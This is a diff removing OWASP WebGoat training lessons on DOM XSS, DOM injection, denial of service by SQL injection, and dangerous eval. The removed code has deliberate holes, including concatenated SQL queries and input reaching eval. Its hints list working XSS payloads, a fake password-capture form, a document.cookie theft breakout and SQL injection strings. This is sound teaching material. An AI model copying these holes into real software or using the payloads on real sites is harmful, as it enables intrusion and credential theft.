-        tr.addElement(new TD(input1));
-        t1.addElement(tr);
-
-        tr = new TR();
-        tr.addElement(new TD("&nbsp;").setColSpan(2));
-
-        t1.addElement(tr);
-
-        tr = new TR();
-        Input b = new Input();
-        b.setType(Input.SUBMIT);
-        b.setValue("Activate!");
-        b.setName("SUBMIT");
-        b.setID("SUBMIT");
-        b.setDisabled(true);
-        tr.addElement(new TD("&nbsp;"));
-        tr.addElement(new TD(b));
-
-        t1.addElement(tr);
-        ec.addElement(t1);
-        Div div = new Div();
-        div.addAttribute("name", "MessageDiv");
-        div.addAttribute("id", "MessageDiv");
-        ec.addElement(div);
-
-        return ec;
-    }
-
-    public Element getCredits()
-    {
-        return super.getCustomCredits("Created by Sherif Koussa&nbsp;", MAC_LOGO);
-    }
-
-    protected Category getDefaultCategory()
-    {
-
-        return Category.AJAX_SECURITY;
-    }
-
-    protected Integer getDefaultRanking()
-    {
-
-        return DEFAULT_RANKING;
-    }
-
-    protected List<String> getHints(WebSession s)
-    {
-
-        List<String> hints = new ArrayList<String>();
-        hints.add("This page is using XMLHTTP to comunicate with the server.");
-        hints.add("Try to find a way to inject the DOM to enable the Activate button.");
-        hints.add("Intercept the reply and replace the body with document.form.SUBMIT.disabled = false;");
-        return hints;
-    }
-
-    public String getTitle()
-    {
-        return "DOM Injection";
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/DOMXSS.java

@@ -1,321 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.io.BufferedReader;
-import java.io.File;
-import java.io.FileReader;
-import java.io.IOException;
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.Script;
-import org.owasp.webgoat.session.*;
-
-
-public class DOMXSS extends SequentialLessonAdapter
-{
-
-    public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
-            .addElement(
-                        new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
-                                .setVspace(0));
-
-    private final static String PERSON = "person";
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-        return super.createStagedContent(s);
-    }
-
-    protected Element doStage1(WebSession s) throws Exception
-    {
-        ElementContainer ec = new ElementContainer();
-
-        StringBuffer attackString = new StringBuffer(s.getParser().getStringParameter(PERSON, ""));
-
-        ec.addElement(mainContent(s));
-
-        if (attackString.toString().toLowerCase().indexOf("img") != -1
-                && attackString.toString().toLowerCase().indexOf("images/logos/owasp.jpg") != -1)
-        {
-            getLessonTracker(s).setStage(2);
-            s.setMessage("Stage 1 completed. ");
-        }
-
-        return (ec);
-    }
-
-    protected Element doStage2(WebSession s) throws Exception
-    {
-        ElementContainer ec = new ElementContainer();
-
-        StringBuffer attackString = new StringBuffer(s.getParser().getStringParameter(PERSON, ""));
-
-        ec.addElement(mainContent(s));
-
-        if (attackString.toString().toLowerCase().indexOf("img") != -1
-                && attackString.toString().toLowerCase().indexOf("onerror") != -1
-                && attackString.toString().toLowerCase().indexOf("alert") != -1)
-        {
-            getLessonTracker(s).setStage(3);
-            s.setMessage("Stage 2 completed. ");
-        } 
-        else
-        {
-            s.setMessage("Only <img onerror...  attacks are recognized for success criteria");
-        }
-
-        return (ec);
-    }
-
-    protected Element doStage3(WebSession s) throws Exception
-    {
-        ElementContainer ec = new ElementContainer();
-
-        StringBuffer attackString = new StringBuffer(s.getParser().getStringParameter(PERSON, ""));
-
-        ec.addElement(mainContent(s));
-
-        if (attackString.toString().toLowerCase().indexOf("iframe") != -1
-                && attackString.toString().toLowerCase().indexOf("javascript:alert") != -1)
-        {
-            getLessonTracker(s).setStage(4);
-            s.setMessage("Stage 3 completed.");
-        } else  if (attackString.toString().toLowerCase().indexOf("iframe") != -1
-                && attackString.toString().toLowerCase().indexOf("onload") != -1
-                && attackString.toString().toLowerCase().indexOf("alert") != -1)
-        {
-            getLessonTracker(s).setStage(3);
-            s.setMessage("Stage 3 completed. ");
-        }
-        else
-        {
-            s.setMessage("Only <iframe javascript/onload...  attacks are recognized for success criteria");
-        }
-        return (ec);
-    }
-
-    protected Element doStage4(WebSession s) throws Exception
-    {
-        ElementContainer ec = new ElementContainer();
-
-        StringBuffer attackString = new StringBuffer(s.getParser().getStringParameter(PERSON, ""));
-
-        ec.addElement(mainContent(s));
-
-        if (attackString.toString().toLowerCase().indexOf("please enter your password:") != -1
-                && attackString.toString().toLowerCase().indexOf("javascript:alert") != -1)
-        {
-            getLessonTracker(s).setStage(5);
-            s.setMessage("Stage 4 completed.");
-        }
-
-        return (ec);
-    }
-
-    protected Element doStage5(WebSession s) throws Exception
-    {
-        ElementContainer ec = new ElementContainer();
-
-        ec.addElement(mainContent(s));
-
-        /**
-         * They pass iff:
-         * 
-         * 1. If the DOMXSS.js file contains the lines "escapeHTML(name)"
-         */
-        String file = s.getWebResource("lessonJS/DOMXSS.js");
-        String content = getFileContent(file);
-
-        if (content.indexOf("escapeHTML(name)") != -1)
-        {
-            makeSuccess(s);
-        }
-
-        return ec;
-    }
-
-    protected ElementContainer mainContent(WebSession s)
-    {
-        StringBuffer attackString = null;
-
-        ElementContainer ec = new ElementContainer();
-        try
-        {
-
-            ec.addElement(new Script().setSrc("lessonJS/DOMXSS.js"));
-
-            ec.addElement(new Script().setSrc("lessonJS/escape.js"));
-
-            ec.addElement(new H1().setID("greeting"));
-
-            ec.addElement(new StringElement("Enter your name: "));
-
-            attackString = new StringBuffer(s.getParser().getStringParameter(PERSON, ""));
-
-            Input input = new Input(Input.TEXT, PERSON, attackString.toString());
-            input.setOnKeyUp("displayGreeting(" + PERSON + ".value)");
-            ec.addElement(input);
-            ec.addElement(new BR());
-            ec.addElement(new BR());
-
-            Element b = ECSFactory.makeButton("Submit Solution");
-            ec.addElement(b);
-        } catch (Exception e)
-        {
-            s.setMessage("Error generating " + this.getClass().getName());
-            e.printStackTrace();
-        }
-        return ec;
-
-    }
-
-    /**
-     * Gets the hints attribute of the HelloScreen object
-     * 
-     * @return The hints value
-     */
-    public List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-
-        hints.add("Stage 1: Try entering the following: " + "&lt;IMG SRC=\"images/logos/owasp.jpg\"/&gt;");
-
-        hints.add("Stage 2: Try entering the following: " + "&lt;img src=x onerror=;;alert('XSS') /&gt;");
-
-        hints.add("Stage 3: Try entering the following: "
-                + "&lt;IFRAME SRC=\"javascript:alert('XSS');\"&gt;&lt;/IFRAME&gt;");
-
-        hints
-                .add("Stage 4: Try entering the following: "
-                        + "Please enter your password:&lt;BR&gt;&lt;input type = \"password\" name=\"pass\"/&gt;&lt;button "
-                        + "onClick=\"javascript:alert('I have your password: ' + pass.value);\"&gt;Submit&lt;/button&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;");
-
-        hints
-                .add("Stage 5: You will find the JavaScripts in tomcat\\webapps\\WebGoat\\javascript (Standart Version) or in WebContent\\javascript (Developer Version).");
-        // Attack Strings:
-
-        // <IMG SRC="images/logos/owasp.jpg"/>
-
-        // <img src=x onerror=;;alert('XSS') />
-
-        // <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
-
-        // Please enter your password:<BR><input type = "password" name="pass"/><button
-        // onClick="javascript:alert('I
-        // have your password: ' +
-        // pass.value);
-        // ">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>
-
-        return hints;
-    }
-
-    /**
-     * Gets the ranking attribute of the HelloScreen object
-     * 
-     * @return The ranking value
-     */
-    private final static Integer DEFAULT_RANKING = new Integer(10);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    protected Category getDefaultCategory()
-    {
-        return Category.AJAX_SECURITY;
-    }
-
-    /**
-     * Gets the title attribute of the HelloScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return ("LAB: DOM-Based cross-site scripting");
-    }
-
-    public String getInstructions(WebSession s)
-    {
-        String instructions = "";
-
-        if (getLessonTracker(s).getStage() == 1)
-        {
-            instructions = "STAGE 1:\tFor this exercise, your mission is to deface this website using the image at the following location: <a href = '/WebGoat/images/logos/owasp.jpg'>OWASP IMAGE</a>";
-        }
-        else if (getLessonTracker(s).getStage() == 2)
-        {
-            instructions = "STAGE 2:\tNow, try to create a JavaScript alert using the image tag";
-        }
-        else if (getLessonTracker(s).getStage() == 3)
-        {
-            instructions = "STAGE 3:\tNext, try to create a JavaScript alert using the IFRAME tag.";
-        }
-        else if (getLessonTracker(s).getStage() == 4)
-        {
-            instructions = "STAGE 4:\tUse the following to create a fake login form:<br><br>"
-                    + "Please enter your password:&lt;BR&gt;&lt;input type = \"password\" name=\"pass\"/&gt;&lt;button "
-                    + "onClick=\"javascript:alert('I have your password: ' + pass.value);\"&gt;Submit&lt;/button&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;";
-        }
-        else if (getLessonTracker(s).getStage() == 5)
-        {
-            instructions = "STAGE 5:\tPerform client-side HTML entity encoding to mitigate the DOM XSS vulnerability. A utility method is provided for you in escape.js.";
-        }
-        return (instructions);
-    }
-
-    private String getFileContent(String content)
-    {
-        BufferedReader is = null;
-        StringBuffer sb = new StringBuffer();
-
-        try
-        {
-            is = new BufferedReader(new FileReader(new File(content)));
-            String s = null;
-
-            while ((s = is.readLine()) != null)
-            {
-                sb.append(s);
-            }
-        } catch (Exception e)
-        {
-            e.printStackTrace();
-        } finally
-        {
-            if (is != null)
-            {
-                try
-                {
-                    is.close();
-                } catch (IOException ioe)
-                {
-
-                }
-            }
-        }
-
-        return sb.toString();
-    }
-
-    public Element getCredits()
-    {
-        return super.getCustomCredits("", ASPECT_LOGO);
-    }
-}

src/main/java/org/owasp/webgoat/lessons/DOS_Login.java

@@ -1,252 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.sql.Connection;
-import java.sql.ResultSet;
-import java.sql.ResultSetMetaData;
-import java.sql.SQLException;
-import java.sql.Statement;
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.H2;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.P;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.DatabaseUtilities;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created October 28, 2003
- */
-public class DOS_Login extends LessonAdapter
-{
-
-    /**
-     * Description of the Field
-     */
-    protected final static String PASSWORD = "Password";
-
-    /**
-     * Description of the Field
-     */
-    protected final static String USERNAME = "Username";
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-
-        try
-        {
-            String username = "";
-            String password = "";
-            username = s.getParser().getRawParameter(USERNAME);
-            password = s.getParser().getRawParameter(PASSWORD);
-
-            // don;t allow user name from other lessons. it would be too simple.
-            if (username.equals("jeff") || username.equals("dave"))
-            {
-                ec.addElement(new H2("Login Failed: 'jeff' and 'dave' are not valid for this lesson"));
-                return (ec.addElement(makeLogin(s)));
-            }
-
-            // Check if the login is valid
-            Connection connection = DatabaseUtilities.getConnection(s);
-
-            String query = "SELECT * FROM user_system_data WHERE user_name = '" + username + "' and password = '"
-                    + password + "'";
-            ec.addElement(new StringElement(query));
-
-            try
-            {
-                Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                    ResultSet.CONCUR_READ_ONLY);
-                ResultSet results = statement.executeQuery(query);
-
-                if ((results != null) && (results.first() == true))
-                {
-                    ResultSetMetaData resultsMetaData = results.getMetaData();
-                    ec.addElement(DatabaseUtilities.writeTable(results, resultsMetaData));
-                    results.last();
-
-                    // If they get back more than one user they succeeded
-                    if (results.getRow() >= 1)
-                    {
-                        // Make sure this isn't data from an sql injected query.
-                        if (results.getString(2).equals(username) && results.getString(3).equals(password))
-                        {
-                            String insertData1 = "INSERT INTO user_login VALUES ( '" + username + "', '"
-                                    + s.getUserName() + "' )";
-                            statement.executeUpdate(insertData1);
-                        }
-                        // check the total count of logins
-                        query = "SELECT * FROM user_login WHERE webgoat_user = '" + s.getUserName() + "'";
-                        results = statement.executeQuery(query);
-                        results.last();
-                        // If they get back more than one user they succeeded
-                        if (results.getRow() >= 3)
-                        {
-                            makeSuccess(s);
-                            String deleteData1 = "DELETE from user_login WHERE webgoat_user = '" + s.getUserName()
-                                    + "'";
-                            statement.executeUpdate(deleteData1);
-                            return (new H1("Congratulations! Lesson Completed"));
-                        }
-
-                        ec.addElement(new H2("Login Succeeded: Total login count: " + results.getRow()));
-                    }
-                }
-                else
-                {
-                    ec.addElement(new H2("Login Failed"));
-                    // check the total count of logins
-                    query = "SELECT * FROM user_login WHERE webgoat_user = '" + s.getUserName() + "'";
-                    results = statement.executeQuery(query);
-                    results.last();
-                    ec.addElement(new H2("Successfull login count: " + results.getRow()));
-
-                }
-            } catch (SQLException sqle)
-            {
-                ec.addElement(new P().addElement(sqle.getMessage()));
-                sqle.printStackTrace();
-            }
-        } catch (ParameterNotFoundException pnfe)
-        {
-            /**
-             * Catching this exception prevents the "Error generating
-             * org.owasp.webgoat.lesson.DOS_Login" message from being displayed on first load. Note
-             * that if we are missing a parameter in the request, we do not want to continue
-             * processing and we simply want to display the default login page.
-             */
-        } catch (Exception e)
-        {
-            s.setMessage("Error generating " + this.getClass().getName());
-        }
-
-        return (ec.addElement(makeLogin(s)));
-    }
-
-    /**
-     * Gets the category attribute of the WeakAuthenticationCookie object
-     * 
-     * @return The category value
-     */
-    protected Category getDefaultCategory()
-    {
-        return Category.DOS;
-    }
-
-    /**
-     * Gets the hints attribute of the CookieScreen object
-     * 
-     * @return The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        hints.add("Use a SQL Injection to obtain the user names. ");
-        hints
-                .add("Try to generate this query: SELECT * FROM user_system_data WHERE user_name = 'goober' and password = 'dont_care' or '1' = '1'");
-        hints.add("Try &quot;dont_care' or '1' = '1&quot; in the password field");
-        return hints;
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(90);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the CookieScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return ("Denial of Service from Multiple Logins");
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element makeLogin(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-
-        // add the login fields
-        Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
-
-        if (s.isColor())
-        {
-            t.setBorder(1);
-        }
-
-        TR row1 = new TR();
-        TR row2 = new TR();
-        row1.addElement(new TD(new StringElement("User Name: ")));
-        row2.addElement(new TD(new StringElement("Password: ")));
-
-        Input input1 = new Input(Input.TEXT, USERNAME, "");
-        Input input2 = new Input(Input.PASSWORD, PASSWORD, "");
-        row1.addElement(new TD(input1));
-        row2.addElement(new TD(input2));
-        t.addElement(row1);
-        t.addElement(row2);
-
-        Element b = ECSFactory.makeButton("Login");
-        t.addElement(new TR(new TD(b)));
-        ec.addElement(t);
-
-        return (ec);
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/DangerousEval.java

@@ -1,282 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.List;
-import java.util.regex.Pattern;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Center;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.HR;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TH;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Eric Sheridan, Aspect Security <a href="http://www.aspectsecurity.com"/>
- * @created October 28, 2003
- */
-
-public class DangerousEval extends LessonAdapter
-{
-    public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
-            .addElement(
-                        new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
-                                .setVspace(0));
-
-    public final static String PASSED = "__DANGEROUS_EVAL_PASS";
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-
-    protected Element createContent(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-        String regex1 = "^[0-9]{3}$";// any three digits
-        Pattern pattern1 = Pattern.compile(regex1);
-
-        try
-        {
-            checkSuccess(s);
-
-            String param1 = s.getParser().getRawParameter("field1", "111");
-            // String param2 = HtmlEncoder.encode(s.getParser().getRawParameter("field2", "4128 3214
-            // 0002 1999"));
-            float quantity = 1.0f;
-            float total = 0.0f;
-            float runningTotal = 0.0f;
-
-            // FIXME: encode output of field2, then s.setMessage( field2 );
-            ec.addElement("<script src='lessonJS/eval.js'> </script>");
-            // <script src='javascript/sameOrigin.js' language='JavaScript'></script>
-            ec.addElement(new HR().setWidth("90%"));
-            ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart ")));
-            Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
-
-            if (s.isColor())
-            {
-                t.setBorder(1);
-            }
-
-            TR tr = new TR();
-            tr.addElement(new TH().addElement("Shopping Cart Items -- To Buy Now").setWidth("80%"));
-            tr.addElement(new TH().addElement("Price").setWidth("10%"));
-            tr.addElement(new TH().addElement("Quantity").setWidth("3%"));
-            tr.addElement(new TH().addElement("Total").setWidth("7%"));
-            t.addElement(tr);
-
-            tr = new TR();
-            tr.addElement(new TD().addElement("Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry "));
-            tr.addElement(new TD().addElement("69.99").setAlign("right"));
-            tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY1", s.getParser().getStringParameter("QTY1", "1"))).setAlign("right"));
-            quantity = s.getParser().getFloatParameter("QTY1", 0.0f);
-            total = quantity * 69.99f;
-            runningTotal += total;
-            tr.addElement(new TD().addElement("$" + total));
-            t.addElement(tr);
-            tr = new TR();
-            tr.addElement(new TD().addElement("Dynex - Traditional Notebook Case"));
-            tr.addElement(new TD().addElement("27.99").setAlign("right"));
-            tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY2", s.getParser().getStringParameter("QTY2", "1"))).setAlign("right"));
-            quantity = s.getParser().getFloatParameter("QTY2", 0.0f);
-            total = quantity * 27.99f;
-            runningTotal += total;
-            tr.addElement(new TD().addElement("$" + total));
-            t.addElement(tr);
-            tr = new TR();
-            tr.addElement(new TD().addElement("Hewlett-Packard - Pavilion Notebook with Intel<65> Centrino<6E>"));
-            tr.addElement(new TD().addElement("1599.99").setAlign("right"));
-            tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY3", s.getParser().getStringParameter("QTY3", "1"))).setAlign("right"));
-            quantity = s.getParser().getFloatParameter("QTY3", 0.0f);
-            total = quantity * 1599.99f;
-            runningTotal += total;
-            tr.addElement(new TD().addElement("$" + total));
-            t.addElement(tr);
-            tr = new TR();
-            tr.addElement(new TD().addElement("3 - Year Performance Service Plan $1000 and Over "));
-            tr.addElement(new TD().addElement("299.99").setAlign("right"));
-
-            tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY4", s.getParser().getStringParameter("QTY4", "1"))).setAlign("right"));
-            quantity = s.getParser().getFloatParameter("QTY4", 0.0f);
-            total = quantity * 299.99f;
-            runningTotal += total;
-            tr.addElement(new TD().addElement("$" + total));
-            t.addElement(tr);
-
-            ec.addElement(t);
-
-            t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
-            if (s.isColor())
-            {
-                t.setBorder(1);
-            }
-
-            ec.addElement(new BR());
-
-            tr = new TR();
-            tr.addElement(new TD().addElement("The total charged to your credit card:"));
-            tr.addElement(new TD().addElement("$" + runningTotal));
-
-            Input b = new Input();
-            b.setType(Input.BUTTON);
-            b.setValue("Update Cart");
-            b.addAttribute("onclick", "purchase('lessons/Ajax/eval.jsp');");
-
-            tr.addElement(new TD().addElement(b));
-            t.addElement(tr);
-            tr = new TR();
-            tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
-            t.addElement(tr);
-            tr = new TR();
-            tr.addElement(new TD().addElement("Enter your credit card number:"));
-            tr.addElement(new TD()
-                    .addElement("<input id='field2' name='field2' type='TEXT' value='4128 3214 0002 1999'>"));
-            t.addElement(tr);
-            tr = new TR();
-            tr.addElement(new TD().addElement("Enter your three digit access code:"));
-            tr.addElement(new TD().addElement("<input id='field1' name='field1' type='TEXT' value='123'>"));
-            // tr.addElement(new TD().addElement(new Input(Input.TEXT, "field1",param1)));
-            t.addElement(tr);
-
-            b = new Input();
-            b.setType(Input.BUTTON);
-            b.setValue("Purchase");
-            b.addAttribute("onclick", "purchase('lessons/Ajax/eval.jsp');");
-
-            tr = new TR();
-            tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("right"));
-            t.addElement(tr);
-
-            ec.addElement(t);
-            ec.addElement(new BR());
-            ec.addElement(new HR().setWidth("90%"));
-
-        } catch (Exception e)
-        {
-            s.setMessage("Error generating " + this.getClass().getName());
-            e.printStackTrace();
-        }
-        return (ec);
-    }
-
-    /**
-     * DOCUMENT ME!
-     * 
-     * @return DOCUMENT ME!
-     */
-    protected Category getDefaultCategory()
-    {
-        return Category.AJAX_SECURITY;
-    }
-
-    /**
-     * Gets the hints attribute of the AccessControlScreen object
-     * 
-     * @return The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        hints.add("The lesson is similar to the standard reflected cross-site scripting lesson.");
-        hints.add("The access code parameter is vulnerable to a reflected cross-site scripting problem.");
-        hints.add("The usual &lt;SCRIPT&gt;alert(document.cookie);&lt;/SCRIPT&gt; will not work in this lesson. Why?");
-        hints.add("User-supplied data is landing in the Javascript eval() function. Your attack will not require the &lt; and &gt; characters.");
-        hints.add("In order to pass this lesson, you must 'alert' the document.cookie.");
-        hints.add("Try 123');alert(document.cookie);('");
-        return hints;
-    }
-
-
-    // <script type="text/javascript">if ( navigator.appName.indexOf("Microsoft") !=-1) 
-    // {var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE", "./", false); 
-    // xmlHttp.send();str1=xmlHttp.responseText;document.write(str1);}</script>
-    /**
-     * Gets the instructions attribute of the WeakAccessControl object
-     * 
-     * @return The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-        String instructions = "For this exercise, your mission is to come up with some input containing a script. You have to try to get this page to reflect that input back to your browser, which will execute the script. In order to pass this lesson, you must 'alert()' document.cookie.";
-        return (instructions);
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(120);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the AccessControlScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return "Dangerous Use of Eval";
-    }
-
-    public Element getCredits()
-    {
-        return super.getCustomCredits("", ASPECT_LOGO);
-    }
-
-    /**
-     * Check to see if JSP says they passed the lesson.
-     * 
-     * @param s
-     */
-    private void checkSuccess(WebSession s)
-    {
-        javax.servlet.http.HttpSession session = s.getRequest().getSession();
-
-        if (session.getAttribute(PASSED) != null)
-        {
-            makeSuccess(s);
-
-            session.removeAttribute(PASSED);
-        }
-    }
-}

src/main/java/org/owasp/webgoat/lessons/Encoding.java

@@ -1,848 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.io.IOException;
-import java.net.URLDecoder;
-import java.net.URLEncoder;
-import java.nio.ByteBuffer;
-import java.nio.CharBuffer;
-import java.nio.charset.Charset;
-import java.nio.charset.CharsetDecoder;
-import java.nio.charset.CharsetEncoder;
-import java.security.MessageDigest;
-import java.security.NoSuchAlgorithmException;
-import java.util.ArrayList;
-import java.util.List;
-import javax.crypto.Cipher;
-import javax.crypto.SecretKey;
-import javax.crypto.SecretKeyFactory;
-import javax.crypto.spec.PBEParameterSpec;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.B;
-import org.apache.ecs.html.Div;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.P;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-import org.owasp.webgoat.util.HtmlEncoder;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created October 28, 2003
- */
-
-public class Encoding extends LessonAdapter
-{
-    public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
-            .addElement(
-                        new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
-                                .setVspace(0));
-
-    private final static String INPUT = "input";
-
-    private final static String KEY = "key";
-
-    // local encoders
-
-    private static sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
-
-    private static sun.misc.BASE64Encoder encoder = new sun.misc.BASE64Encoder();
-
-    // encryption constant
-
-    private static byte[] salt = { (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00,
-            (byte) 0x00, (byte) 0x00 };
-
-    /**
-     * Returns the base 64 decoding of a string.
-     * 
-     * @param str
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     * @exception IOException
-     *                Description of the Exception
-     */
-
-    public static String base64Decode(String str) throws IOException
-    {
-
